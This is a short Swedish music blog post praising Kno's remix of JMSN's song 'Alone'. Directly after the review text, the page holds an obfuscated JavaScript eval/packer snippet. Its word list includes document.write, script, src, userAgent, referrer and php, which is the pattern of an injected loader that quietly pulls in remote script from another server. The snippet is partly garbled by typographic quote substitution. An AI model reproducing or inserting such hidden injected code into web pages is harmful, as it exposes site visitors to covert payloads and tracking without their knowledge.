Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

JMSN – Alone (Kno Remix)

JMSN – Alone (Kno Remix)
Alexander Gylemo

Söndagsgunget forstätter här på Revue.se med en remix på amerikanaren JMSN’s stämningsfulla ”Alone”, låten blir inte remixad av vem som helst heller då Kno från en av mina favorithiphopgrupper Cunnylinguists sätter sitt namn på omtolkningen. Cunnylinguists berömelse beror mycket på deras talang att bygga upp arrangemang och beats, dessa skills återfinner vi självklart i remixen när Kno hoppar in och lägger till en hel del bas, distortade snares och gör låten ännu mer hemsökt än originalet.

Stämning till hundra, något vi alltid får då någon från Cunnylinguists är med och drar i trådarna.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dhtbi|var|u0026u|referrer|hiyer||js|php’.split(’|’),0,{}))
JMSN – Alone (Kno Remix) by iamjmsn

Tags